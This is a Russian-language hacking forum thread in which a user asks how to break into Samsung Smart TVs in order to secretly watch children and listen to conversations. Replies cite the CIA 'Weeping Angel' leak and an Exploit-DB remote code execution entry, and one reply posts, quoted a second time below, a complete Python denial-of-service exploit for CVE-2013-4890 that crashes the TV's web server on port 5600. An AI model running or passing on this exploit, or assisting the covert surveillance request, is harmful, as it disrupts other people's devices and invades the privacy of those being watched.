• 🔥 Бесплатный курс от Академии Кодебай: «Анализ защищенности веб-приложений»

    🛡 Научитесь находить и использовать уязвимости веб-приложений.
    🧠 Изучите SQLi, XSS, CSRF, IDOR и другие типовые атаки на практике.
    🧪 Погрузитесь в реальные лаборатории и взломайте свой первый сайт!
    🚀 Подходит новичкам — никаких сложных предварительных знаний не требуется.

    Доступ открыт прямо сейчас Записаться бесплатно

Действительно ли возможен взлом телевизоров samsung smart tv

thunder

Green Team
08.12.2016
219
26
Возможен ли взлом телевизоров samsung smart tv ( с целью видеонаблюдения за детьми , прослушка разговора ) ? Какие инструменты актуальны для этой цели ?
 
статья про смарт тв от 15 года, там по ссылкам можно наковырять и за 14-13 год.

 
ghostphisher : Статья это хорошо :) Вот только я не увидел никакой конкретики ( гайд взлома , инструменты ).
 
На днях, на wikileaks как раз была опубликована коллекция инструментов для взлома, которые принадлежали ЦРУ, в том числе там есть и упоминание о эксплойте для тех самых телевизоров Samsung, эксплойт называется weeping angel.
 
На эксплоит дб лежат с 15 года
Samsung SmartViewer BackupToAvi 3.0 - Remote Code Execution
[doublepost=1489179831,1489125160][/doublepost]

Под спойлер спрятал код для DoS ящиков Самсы

#!/usr/bin/python
#
# Exploit Title: Samsung TV Denial of Service (DoS) Attack
# Exploit Author: Malik Mesellem - @MME_IT -
# module by: pedr0 ubuntu [ r00t-3xp10it ]
#
# Date: 07/21/2013
# CVE Number: CVE-2013-4890
# Vendor Homepage:
# P.O.C =>
#
# Description:
# The web server (DMCRUIS/0.1) on port TCP/5600 is crashing by sending a long
# HTTP GET request As a results, the TV reboots...
# Tested successfully on my Samsung PS50C7700 plasma TV, with the latest firmware :)
#
###



# ----------------------------
# import dependencies
# ----------------------------
import httplib
import time
import sys
import os
import time



# ----------------------------
# script colorize output
# ----------------------------
BLUE = '\033[94m'
RED = '\033[91m'
GREEN = '\033[32m'
WHITE = '\033[0m'
ORANGE = '\033[33m'



# ----------------------------
# exploit banner
# ----------------------------
print BLUE+"**************************************************************"
print WHITE+" Author: Malik Mesellem - @MME_IT - "
print WHITE+" Exploit: Denial of Service (DoS) attack"
print WHITE+" module by: pedr0 ubuntu aka r00t-3xp10it"
print ""
print WHITE+" Description:"
print WHITE+" The web server (DMCRUIS/0.1) on port TCP/5600"
print WHITE+" is crashing by sending a long HTTP GET request."
print WHITE+" Tested successfully on my Samsung PS50C7700 plasma TV :)"
print BLUE+"**************************************************************"




# ----------------------------
# Sends the payload
# ----------------------------
print ""
print BLUE+"[*]"+GREEN+" press ctrl+z to stop"
print BLUE+"[*]"+WHITE+" Sending the malicious payload..."
conn = httplib.HTTPConnection(sys.argv[1],5600)
conn.request("GET", "A"*300)
conn.close()

# ----------------------------
# Checks the response
# ----------------------------
print BLUE+"[*]"+WHITE+" Checking the status..."
response = 0
while response == 0:
response = os.system("ping -c 1 " + sys.argv[1] + "> /dev/null 2>&1")
if response != 0:
print BLUE+"[*]"+GREEN+" (Success):"+RED+" the target seems to be down !!!"
print WHITE+""
time.sleep(10)
 
На эксплоит дб лежат с 15 года
Samsung SmartViewer BackupToAvi 3.0 - Remote Code Execution
[doublepost=1489179831,1489125160][/doublepost]

Под спойлер спрятал код для DoS ящиков Самсы

#!/usr/bin/python
#
# Exploit Title: Samsung TV Denial of Service (DoS) Attack
# Exploit Author: Malik Mesellem - @MME_IT -
# module by: pedr0 ubuntu [ r00t-3xp10it ]
#
# Date: 07/21/2013
# CVE Number: CVE-2013-4890
# Vendor Homepage:
# P.O.C =>
#
# Description:
# The web server (DMCRUIS/0.1) on port TCP/5600 is crashing by sending a long
# HTTP GET request As a results, the TV reboots...
# Tested successfully on my Samsung PS50C7700 plasma TV, with the latest firmware :)
#
###



# ----------------------------
# import dependencies
# ----------------------------
import httplib
import time
import sys
import os
import time



# ----------------------------
# script colorize output
# ----------------------------
BLUE = '\033[94m'
RED = '\033[91m'
GREEN = '\033[32m'
WHITE = '\033[0m'
ORANGE = '\033[33m'



# ----------------------------
# exploit banner
# ----------------------------
print BLUE+"**************************************************************"
print WHITE+" Author: Malik Mesellem - @MME_IT - "
print WHITE+" Exploit: Denial of Service (DoS) attack"
print WHITE+" module by: pedr0 ubuntu aka r00t-3xp10it"
print ""
print WHITE+" Description:"
print WHITE+" The web server (DMCRUIS/0.1) on port TCP/5600"
print WHITE+" is crashing by sending a long HTTP GET request."
print WHITE+" Tested successfully on my Samsung PS50C7700 plasma TV :)"
print BLUE+"**************************************************************"




# ----------------------------
# Sends the payload
# ----------------------------
print ""
print BLUE+""+GREEN+" press ctrl+z to stop"
print BLUE+""+WHITE+" Sending the malicious payload..."
conn = httplib.HTTPConnection(sys.argv[1],5600)
conn.request("GET", "A"*300)
conn.close()

# ----------------------------
# Checks the response
# ----------------------------
print BLUE+""+WHITE+" Checking the status..."
response = 0
while response == 0:
response = os.system("ping -c 1 " + sys.argv[1] + "> /dev/null 2>&1")
if response != 0:
print BLUE+""+GREEN+" (Success):"+RED+" the target seems to be down !!!"
print WHITE+""
time.sleep(10)
Спасибо за конкретику . Как фремворк поддерживает данный эксплоит (в какой фремворк его можно засунуть ) ? Там ,что то написано про поддержку windows 7 ..
[doublepost=1489198730][/doublepost]
На днях, на wikileaks как раз была опубликована коллекция инструментов для взлома, которые принадлежали ЦРУ, в том числе там есть и упоминание о эксплойте для тех самых телевизоров Samsung, эксплойт называется weeping angel.
Документы по weeping angel нашёл , а вот само по пока нет. По мимо документов , программы сливались ?
 
Инструменты на паблик еще не скоро попадут. Хотя про сливы оных я не увидел новостей. И просить тут тоже не стоит.
 
ghostphisher: А, что по поводу эксплоита Samsung SmartViewer BackupToAvi 3.0 - Remote Code Execution..как его реализовать - в какой фрейморк его можно установить ?
 
[ А, что по поводу эксплоита Samsung SmartViewer BackupToAvi 3.0 - Remote Code Execution..как его реализовать - в какой фрейморк его можно установить ?

Там же в шапке кода написано на чем код, соотвественно его надо запускать на этом же. Зачем фрейм, если он так работать может..?
 
Мы в соцсетях:

Взломай свой первый сервер и прокачай скилл — Начни игру на HackerLab

Похожие темы